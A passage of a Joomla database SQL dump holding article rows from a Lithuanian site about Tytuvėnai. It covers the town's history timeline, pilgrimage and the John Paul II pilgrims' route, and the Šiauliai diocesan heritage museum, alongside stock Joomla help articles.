00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',5,0,0,'','',1,7,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(146,230,'Tytuvėnų istorijos fragmentai','tytuvenu-istorija','','<p><strong>Senasis geležies amžius.</strong> Šiose vietose jau gyventa baltų genčių. Tytuvėnų apylinkes tyrinėjo   profesorius Mykolas Michelbertas. Kuršių  pilkapyne jo surasti archeologiniai radiniai Kelmės krašto muziejaus ekspozicijos puošmena.<br /><strong>XIII a.</strong> Teodoras Narbutas — lietuvių istorikas romantikas, savo raštuose užsimena apie Tytuvėnuose stovėjusią Žemaičių medinę pilį.<br /><strong>XV a.</strong> Tytuvėnai pažymėti Nikolajaus Kuziečio sudarytame Vidurio Europos žemėlapyje, kuriame pateiktas Lietuvos kartografinis vaizdas.<br /><strong>XVI a.</strong> Tytuvėnų žemes,  Lietuvos didysis  kunigaikštis Aleksandras  dovanoja  Aleknos Sudimantaičio dukrai.<br /><br /><strong>1500 m.</strong> Tytuvėnų dvaras minimas rašytiniuose šaltiniuose nutolęs  apie 3 km nuo miestelio.<br /><strong>1555 m.</strong> Tytuvėnuose pastatyta medinė bažnytėlė ant Šv. Jurgio kalno, aplink ją ir pradėjo formuotis miestelis.<br /><strong>1589 m.</strong> Tytuvėnus valdė LDK kancleris etmonas Leonas Sapiega, vėliau atiteko Brastos vaivadai Kristupui  Zienavičiui.<br /><strong>1609 m.</strong> Tytuvėnus nusipirko  LDK vėliavininkas, Žemaičių žemės teisėjas Andrius Valavičius.<br /><strong>1614 m.</strong> Andrius Valavičius ,Tryškiuose pasirašo  aktą skirtą bernardinų vienuoliams apie ketinimus funduoti bažnyčios ir vienuolyno statybą.<br />Apie <strong>1616 m.</strong> Tytuvėnuose atidaryta pirmoji parapijinė mokykla.<br /><strong>1618 m.</strong> padėtas kertinis bažnyčios akmuo.<br /><strong>1635 m.</strong> Žemaitijos vyskupas Jurgis Tiškevičius ją pašventino ir titulavo Švč. Mergelės Marijos Angelų  Karalienės vardu.<br /><strong>1724 m.</strong> Tytuvėnams suteikiama prekymečių privilegija.<br /><strong>1736 m.</strong> Tytuvėnų bernardinų vienuolyne įkurtas noviciatas.<br /><strong>1772-1780 m.</strong> Tytuvėnų bažnyčios šventorius aptvertas arkadine galerija, kurioje įrengtos kryžiaus kelio stotys.<br /><strong>1831 m.</strong> Tytuvėnus buvo užėmusi sukilėlių kariuomenė vedama generolo Juozo Šimanovskio, vienuolyno pastatas buvo pritaikytas gynybai.<br /><strong>1863 m.</strong> Tytuvėnų miškuose sukilėliai susikovė su caro kariuomene, čia žuvo Zigmantas Citavičius, sukilimo Raseinių apskrities karinis viršininkas<br /><strong>1864 m.</strong> Tytuvėnų bernardinai apkaltinami dalyvavus sukilime - vienuolynas uždaromas, bažnyčią įsakoma atiduoti čia atkeltiems gyventi stačiatikiams.<br /><strong>1868 m.</strong> aktyviai pasipriešinus parapijiečiams, padedant vyskupui Motiejui Valančiui bažnyčią pavyksta apginti ir išsaugoti.<br /><strong>1875 m.</strong> Tytuvėnuose pastatoma Dievo Motinos ikonos „Kazanskaja“ cerkvė.<br /><strong>1911 m.</strong> paskutinis Tytuvėnų dvaro savininkas Eugenijus Romeris vedė dailinkę Sofiją Dembovskytę.<br /><strong>1915 m.</strong> Pirmojo pasaulinio karo metu per Tytuvėnus ėjo fronto linija, nukentėjo bažnyčia.<br /><strong>1917 m.</strong> Tytuvėnuose veikė lietuviška parapijos mokykla.<br /><strong>1941m.</strong> birželio 16 d., sovietams okupavus Lietuvą, prasideda trėmimai į Sibirą. Išvežami Eugenijus ir Sofija Romeriai.<br /><strong>1941 m.</strong> rugpjūčio 12 d.,jau prasidėjus karui, sušaudyti 125 Tytuvėnuose gyvenę žydai.<br /><strong>1945-1948 m.</strong> Tytuvėnų apylinkėse veikė Prisikėlimo ir Kęstučio apygardos partizanai.<br /><strong>1945 m.</strong> Tytuvėnuose pradėjo veikti biblioteka<br /><strong>1946 m.</strong> Atidaryta suaugusių mokykla.<br /><strong>1949 m.</strong> Pradėjo veikti vidurinė mokykla.<br /><strong>1956 m.</strong> Tytuvėnams suteiktas miesto statusas.<br /><strong>2002 m.</strong> Lietuvos Respublikos prezidentas patvirtino Tytuvėnų miestelio herbą.<br /><strong>2004 m.</strong> Tytuvėnuose pradėti rengti tarptautiniai vasaros festivaliai.<br /><strong>2006 m.</strong> Tytuvėnų vidurinė mokykla tapo gimnazija.<br /><strong>2008 m.</strong> kovo 28 d. pradėjo veikti viešoji įstaiga „Tytuvėnų  piligrimų centras“.<br /><strong>2010 m.</strong> Šiaulių vyskupas Eugenijus Bartulis pasirašė dekretą dėl Šiaulių vyskupijos bažnytinio paveldo muziejaus įsteigimo Tytuvėnų bernardinų vienuolyno ansamblyje.</p>','',1,0,0,46,'2011-04-03 10:13:58',135,'','2011-10-31 21:48:02',135,0,'0000-00-00 00:00:00','2011-04-03 10:15:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',8,0,2,'','',1,273,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(147,231,'Is it useful to install the sample data?','is-it-useful-to-install-the-sample-data','','Well you are reading it right now! This depends on what you want to achieve. If you are new to Joomla! and have no clue how it all fits together, just install the sample data. If you don\'t like the English sample data because you - for instance - speak Chinese, then leave it out.','',-2,0,0,46,'2008-08-11 09:12:55',135,'','2008-08-11 09:12:55',135,0,'0000-00-00 00:00:00','2006-10-10 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,0,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(148,232,'How do I remove an Article?','how-do-i-remove-an-article','','<p>To completely remove an Article, select the Articles that you want to delete and move them to the Trash. Next, open the Article Trash in the Content Menu and select the Articles you want to delete. After deleting an Article, it is no longer available as it has been deleted from the database and it is not possible to undo this operation.  </p>','',-2,0,0,46,'2008-08-11 09:19:01',135,'','2008-08-11 09:19:01',135,0,'0000-00-00 00:00:00','2006-10-10 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,0,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(149,233,'What is the difference between Archiving and Trashing an Article?','what-is-the-difference-between-archiving-and-trashing-an-article','','<p>When you <em>Archive </em>an Article, the content is put into a state which removes it from your site as published content. The Article is still available from within the Control Panel and can be <em>retrieved </em>for editing or republishing purposes. Trashed Articles are just one step from being permanently deleted but are still available until you Remove them from the Trash Manager. You should use Archive if you consider an Article important, but not current. Trash should be used when you want to delete the content entirely from your site and from future search results.  </p>','',-2,0,0,46,'2008-08-11 05:19:43',135,'','2008-08-11 05:19:43',135,0,'0000-00-00 00:00:00','2006-10-10 06:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',8,0,0,'','',1,6,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(150,234,'Joomla! Facts','joomla-facts','','<p>Here are some interesting facts about Joomla!</p><ul><li><span>Over 210,000 active registered Users on the <a href=\"http://forum.joomla.org\" target=\"_blank\" title=\"Joomla Forums\">Official Joomla! community forum</a> and more on the many international community sites.</span><ul><li><span>over 1,000,000 posts in over 200,000 topics</span></li><li>over 1,200 posts per day</li><li>growing at 150 new participants each day!</li></ul></li><li><span>1168 Projects on the JoomlaCode (<a href=\"http://joomlacode.org/\" target=\"_blank\" title=\"JoomlaCode\">joomlacode.org</a> ). All for open source addons by third party developers.</span><ul><li><span>Well over 6,000,000 downloads of Joomla! since the migration to JoomlaCode in March 2007.<br /></span></li></ul></li><li><span>Nearly 4,000 extensions for Joomla! have been registered on the <a href=\"http://extensions.joomla.org\" target=\"_blank\" title=\"http://extensions.joomla.org\">Joomla! Extension Directory</a>  </span></li><li><span>Joomla.org exceeds 2 TB of traffic per month!</span></li></ul>','',-2,0,0,47,'2008-08-09 16:46:37',135,'','2008-08-09 16:46:37',135,0,'0000-00-00 00:00:00','2006-10-07 14:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',13,0,0,'','',1,50,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(151,235,'Piligrimai','piligrimai','','<p><strong>Piligrimystė</strong></p>\n<p>Piligrimystė į šventas vietas vyksta nuo seniausių laikų. Šis reiškinys yra paplitęs visose svarbiausiose pasaulio religijose. Piligriminės kelionės – tai pirmosios žmonijos kelionės, kurių nelėmė išgyvenimo būtinumas.</p>\n<p>Kas yra piligrimystė? Kodėl milijonai žmonių ištisus metus keliauja į šventas vietas? Kokios vietos laikomos šventomis ir kur yra pagrindiniai piligriminiai centrai? Piligrimystė yra vienas iš žmonių judėjimo erdvėje tipų – kelionė į šventą erdvę. Krikščionybėje piligrimystė vertinama kaip savanoriškas pasišventimo aktas.</p>\n<p>Piligrimų kelionės tikslas – šventa vieta ar šventas objektas. Tokiose vietose jaučiamas dieviškumas ar šventybė. Piligrimystės vietos dažniausiai yra tos, kurios susijusios su religijos atsiradimu (Jeruzalė, Betliejus), jos įkūrėjų, pranašų ar šventųjų gyvenimu. Šventos vietos – tai ir tos vietos, kur konkretus žmogus patyrė apsireiškimą (ar čia įvyko kitas stebuklas), pvz., Švč. Mergelės Marijos apsireiškimų vietos Gvadelupoje, Lurde, Fatimoje, Knoke, Mejugorjėje ir kt. Piligriminėse vietose saugomos šventųjų relikvijos, šventi paveikslai, ikonos, skulptūros. Šventose vietose būna palaidoti šventi žmonės (šv. Jokūbo kapas Santjago de Komposteloje).</p>\n<p>Kitos piligrimystės vietos – tai administraciniai religijos centrai (Vatikanas). Katalikų Bažnyčia sąvoka šventovė nusako „bažnyčią ar kitą šventą vietą, kur tikintieji gausiai atlieka maldingas keliones skatinamo ypatingų religinių motyvų pritariant vietos ordinarui“.<br />Pakeliui į konkrečią vietovę piligrimai aplanko vis daugiau religinės svarbos vietų. Tokios vietos (bažnyčios, vienuolynai) simboliškai žymi piligrimų kelią iš profanum į sacrum pasaulį.</p>\n<p>Piligriminės kelionės žinomos visose pasaulio religijose. Anksčiausieji duomenys apie piligrimystę mus pasiekia iš Mesopotamijos. Gilgamešo epe, didvyris Gilgamešas, norįs būti nemirtingas, keliauja pas išmintingąjį Utnapištį. XIX a. prieš Kristų Asirų karalius Šalmaneseras III keliavo į Babilono ir Borsipos šventyklas.</p>\n<p>Senovės Egipte į pagrindinių dievų šventoves per kasmetines šventes susirinkdavo milžiniškos žmonių minias. Tokių švenčių metu vykdavo procesijos upėmis arba miesto gatvėmis. Antikinėje Graikijoje daug piligrimų, ypač per olimpines žaidynes, keliaudavo į Dzeuso šventovę Olimpijoje.</p>\n<p>Krikščionybėje piligrimystės reiškinys atsiskleidžia ryškiausiai. Pirmieji keikščionių piligrimai buvo Trys karaliai, aplankę kūdikėlį Jėzų.<br />Žmonės jau nuo II amžiaus keliauja į Romą, kur buvo nukankinti šventieji Petras ir Paulius. Krikščioniškos piligrimystės į Jeruzalę ir kitus Šventos Žemės miestus įsitvirtino jau III amžiuje ir ypač sustiprėjo, imperatoriui Konstantinui 313 m. Romos imperijoje legalizavus krikščionybę.<br />Piligriminės kelionės ypač populiarios tarp katalikų. Didžiausi krikščionių piligriminiai centrai beveik išskirtinai priklauso Romos Katalikų bažnyčiai. Didžiulės minios piligrimų keliauja į Romą ar į Mergelės Marijos apsireiškimų vietas Lurde (1858 m.), Fatimoje (1917 m.) Ten paliktos žmogaus kūno dalių kopijas iš medžio bei metalo (votai) simbolizuoja stebuklingą išgijimą ar išsigelbėjimą.</p>\n<p>Piligrimystė turi ir simbolinę reikšmę. Tai kelionė ne tik į išoriškai apčiuopiamą vietą, bet taip pat kelionė į save savo vidaus erdves. Piligriminė kelionė išsilaisvinimo ir apsivalymo kelias, kurį perėjęs maldininkas persikelia iš žemiško pasaulio į šventybės karalystę.<br /><br /><br /><strong>Jono Pauliaus II piligrimų kelias</strong><br /><br />(2007 m. rugpjūčio 12 d.) <br />Vyriausybė 2007 m. rugpjūčio 8 d. patvirtino Jono Pauliaus II piligrimų kelio programą. Objektai, kuriuose lankėsi Lietuvoje 1993 m. viešėjęs popiežius Jonas Paulius II, arba kurie vienaip ar kitaip susiję su jo veikla sujungti į vieną piligriminį kelią. Juos numatoma pritaikyti piligrimų reikmėm, kad atvykę piligrimai ir turistai juos lankydami galėtų rasti reikalingą viešą infrastruktūrą.</p>\n<p>Į Jono Pauliaus II piligrimų kelią įtraukta: Vilniaus arkikatedra bazilika, Aušros Vartų koplyčia ir Šv. Teresės bažnyčia, Vilniaus Kryžiaus kelias (Vilniaus Kalvarijos), Trakų gotikinė Švč. Mergelės Marijos Apsilankymo parapinė bažnyčia, Kauno arkikatedra bazilika, Kauno Kristaus Prisikėlimo bažnyčia, Pažaislio kamaldulių vienuolyno ansamblis, Šiluvos Švč. Mergelės Marijos Gimimo bazilika ir Šiluvos Švč. Mergelės Marijos Apsireiškimo koplyčia bei tarp jų esanti teritorija, Kryžių kalnas, Šiaulių katedra, Tytuvėnų bažnyčios ir vienuolyno ansamblis, Marijampolės bazilika ir palaimintojo Jurgio Matulaičio koplyčia jo tėviškėje Lūginėje, Žemaičių Kalvarijos Švč. Mergelės Marijos apsilankymo bazilika ir Kryžiaus kelio koplyčios, Pivašiūnų Švč. Mergelės Marijos Ėmimo į dangų bažnyčia.</p>','',1,0,0,47,'2011-04-08 06:38:34',135,'','2011-10-31 11:26:12',135,0,'0000-00-00 00:00:00','2011-04-08 06:38:34','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',12,0,2,'','',1,2297,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(152,236,'The Joomla! Community','the-joomla-community','','<p><strong>Got a question? </strong>With more than 210,000 members, the Joomla! Discussion Forums at <a href=\"http://forum.joomla.org/\" target=\"_blank\" title=\"Forums\">forum.joomla.org</a> are a great resource for both new and experienced users. Ask your toughest questions the community is waiting to see what you\'ll do with your Joomla! site.</p><p><strong>Do you want to show off your new Joomla! Web site?</strong> Visit the <a href=\"http://forum.joomla.org/viewforum.php?f=514\" target=\"_blank\" title=\"Site Showcase\">Site Showcase</a> section of our forum.</p><p><strong>Do you want to contribute?</strong></p><p>If you think working with Joomla is fun, wait until you start working on it. We\'re passionate about helping Joomla users become contributors. There are many ways you can help Joomla\'s development:</p><ul>	<li>Submit news about Joomla. We syndicate Joomla-related news on <a href=\"http://news.joomla.org\" target=\"_blank\" title=\"JoomlaConnect\">JoomlaConnect<sup>TM</sup></a>. If you have Joomla news that you would like to share with the community, find out how to get connected <a href=\"http://community.joomla.org/connect.html\" target=\"_blank\" title=\"JoomlaConnect\">here</a>.</li>	<li>Report bugs and request features in our <a href=\"http://joomlacode.org/gf/project/joomla/tracker/\" target=\"_blank\" title=\"Joomla! developement trackers\">trackers</a>. Please read <a href=\"http://docs.joomla.org/Filing_bugs_and_issues\" target=\"_blank\" title=\"Reporting Bugs\">Reporting Bugs</a>, for details on how we like our bug reports served up</li><li>Submit patches for new and/or fixed behaviour. Please read <a href=\"http://docs.joomla.org/Patch_submission_guidelines\" target=\"_blank\" title=\"Submitting Patches\">Submitting Patches</a>, for details on how to submit a patch.</li><li>Join the <a href=\"http://forum.joomla.org/viewforum.php?f=509\" target=\"_blank\" title=\"Joomla! development forums\">developer forums</a> and share your ideas for how to improve Joomla. We\'re always open to suggestions, although we\'re likely to be sceptical of large-scale suggestions without some code to back it up.</li><li>Join any of the <a href=\"http://www.joomla.org/about-joomla/the-project/working-groups.html\" target=\"_blank\" title=\"Joomla! working groups\">Joomla Working Groups</a> and bring your personal expertise to the Joomla community. </li></ul><p>These are just a few ways you can contribute. See <a href=\"http://www.joomla.org/about-joomla/contribute-to-joomla.html\" target=\"_blank\" title=\"Contribute\">Contribute to Joomla</a> for many more ways.</p>','',-2,0,0,47,'2008-08-12 16:50:48',135,'','2008-08-12 16:50:48',135,0,'0000-00-00 00:00:00','2006-10-11 02:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',12,0,0,'','',1,52,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(153,237,'Šiaulų bažnytinio paveldo muziejus','siauliu-baznytinio-paveldo-muziejus','','<p style=\"text-align: right;\"><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Muziejaus nuotraukų galeriją galima aplankyti <a href=\"index.php?option=com_content&amp;view=section&amp;id=7&amp;Itemid=49\">čia</a><br /></span></p>\n<p align=\"left\"> </p>\n<p align=\"left\"><span style=\"font-family: Tahoma;\">Muziejus yra viešosios įstaigos „Tytuvėnų piligrimų centras“ padalinys.<br />Muziejus įkurtas Šiaulių vyskupo Eugenijaus Bartulio dekretu 2010 metais.<br />Muziejaus vadovė Rūta Krencienė.<br />Muziejaus tikslas — kaupti, saugoti ir populiarinti Šiaulių vyskupijos bažnyčių ir vienuolijų istorijos ir meno palikimą. Yra labai svarbu surinkti ir apsaugoti jau nenaudojamus liturgijoje reikmenis, dailės kūrinius, istorinius dokumentus bei knygas.<br />Muziejaus buveinės adresas: Maironio 2A, Tytuvėnai, Kelmės raj. LT-86484<br />Šiuo metu muziejaus patalpos, t.y. Tytuvėnų bernardinų vienuolynas, yra remontuojamas ir restauruojamas. Nėra nuolat veikiančios ekspozicijos, yra renkami ir tvarkomi muziejaus fondai.</span></p>\n<p align=\"left\"><span style=\"font-family: Tahoma;\"><br /></span></p>\n<p align=\"left\"><span style=\"font-family: Tahoma;\"> </span></p>\n<p style=\"text-align: left;\"><strong><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">MUZIEJAUS STRUKTŪRINĖS GAIRĖS</span></strong></p>\n<p><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Muziejus steigiamas pagal Popiežiškosios kultūros tarybos rekomendacijas (1999m. gegužės mėn. 23 d. sprendimas „Dėl kultūros pastoracijos“).</span></p>\n<p><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\"><strong>Muziejaus tikslas:</strong> </span></p>\n<ul>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Sukurti muziejų, kaupiantį, saugantį ir skleidžiantį Šiaulių vyskupijos istorijos ir meno palikimą. </span></li>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Įvairiomis formomis (parodomis, ekspozicijomis, susitikimais, leidiniais ir kt.) aktualinti  vyskupijos istorinio ir meninio palikimo savitumą ir vertę. </span></li>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Lietuvoje skleisti ir puoselėti Vakarų Europos krikščioniškąsias ir kultūros vertybes, įtakojančias demokratijos plėtrą, pilietinės visuomenės stiprėjimą bei žmogaus, kaip esminės vertybės, augimą. </span></li>\n</ul>\n<p><strong><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Muziejaus misija:</span></strong></p>\n<ul>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Šiaulių vyskupijos muziejus būtų pastovi ir atvira kultūriniam bendradarbiavimui su visuomene kultūros įstaiga. Jos vaidmuo būtų kaupti ir saugoti Šiaulių vyskupystės ( dekanatai: Joniškio, Pakruojo, Radviliškio, Kelmės, Šiaulių. Tai  67 parapijos) bažnyčios meno, istorijos ir memorialinį paveldą, kitas muziejines vertybes. </span></li>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Muziejus viešai ir autentiškai pristatytų muziejines  vertybes  ir tęstų krikščioniškąsias regiono ir valstybės tradicijas. </span></li>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Kadangi įstaiga kuriama buvusiame vienuolyne, tai muziejuje būtų pristatomos  vienuolynų sukurtos dvasinio gyvenimo sistemos, reikšmingos dvasinės patirties tobulinimo keliu einančiam dabarties žmogui . </span></li>\n<li><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Muziejus  teiktų kultūros, švietimo ir informacines paslaugas, kurios palaikytų ir stiprintų istorinę, kultūrinę bei religinę Lietuvos piliečių tapatybę. </span></li>\n</ul>\n<p style=\"text-align: left;\"> </p>\n<p style=\"text-align: left;\"><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\"><br /><strong>Muziejaus istorinis kontekstas</strong></span></p>\n<p><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Muziejus įsikurtų Tytuvėnų bernardinų vienuolyno rūmų vakarinio korpuso antrame aukšte ir pietvakarių rizalite, virš refektoriaus, buvusioje vienuolyno bibliotekos patalpoje.<br />Vienuolyno rūmai – tai mažiausiai pakitęs ansamblio pastatas nuo jo pastatymo laikų. Tai – trijų korpusų gyvenamasis namas, dviem galais besišliejantis prie pietinės bažnyčios sienos. Tai – puikus vėlyvojo renesanso architektūros Lietuvoje pavyzdys.<br />Tytuvėnų Švč. Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblis yra vienas įdomiausių ir didžiausių Lietuvos  sakralinės XVII-XVIII a. architektūros kompleksų, kurio formose ryški daugiasluoksnė gotikos, renesanso ir baroko stilių dermė. Šventovė su vienuolynu išsiskiria tuo, kad jie pastatyti nuošalioje pelkėtoje ir miškingoje  vietoje mažai tenukentėjo nuo karų. Čia niekada nesiautėjo gaisrai, todėl buvo išvengta esminių perstatymų, ir bažnyčia  beveik keturis šimtmečius buvo maldos namais. Šis bernardinų vienuolyno ir bažnyčios ansamblis yra vienas iš vertingiausių barokinių ansamblių ne tik Lietuvoje, bet ir visoje Šiaurės Rytų Europoje.<br />Ansamblis išsiskiria vienintele iki mūsų dienų Lietuvoje išlikusia  vienuolyno kalvarija.  1771-1778 m. sukurta Kryžiaus kelio stočių galerija su 25 tapytomis ir 14 gipsinių horeljefinių kompozicijų, 1775-1778 m. šventoriaus centre pastatyta Kristaus laiptų koplyčia       <br />Kančios istorijos stočių išdėstymas arkadinėse galerijose daro ansamblį neįprastą ir išsiskiriantį iš kitų Lietuvos bernardinų bažnyčių, verčia susimąstyti apie bernardiniškojo meno estetiką ir Tytuvėnų Kryžiaus kelio originalumą. Ši vienuolyno kalvarija atspindi  bernardiniškojo pamaldumo Kristaus kančiai tradiciją ir potridentiniu laikotarpiu Lietuvos Didžiojoje Kunigaikštystėje (LDK) paplitusią naują piligrimystės formą – Kalvarijų, arba Naujųjų Jeruzalių, lankymą ir apvaikščiojimą. Kryžiaus kelias  čia vaizduojamas per dailės kūrinių siužetus. <br />Tytuvėnų Kryžiaus kelio įsteigimui lemiamą reikšmę turėjo piligrimystė į Šventąją Žemę. Vienuoliai, nukeliavę į Jeruzalę, pasisemdavo reikiamos patirties apie ten esantį Kančios kelią, atsigabendavo šventosios žemės bei įvairių relikvijų, kurias išdėstydavo steigiamose Naujose Jeruzalėse. Tytuvėnų Kryžiaus kelio įkūrimą nulėmė vienuolio Antano Burnickio kelionė į Šventąją Žemę XVII a. antroje pusėje. Vienuolio pargabentos  relikvijos, apgaubtos stikliniais gaubtais, iki šių dienų išsaugotos prie kai kurių stočių ir 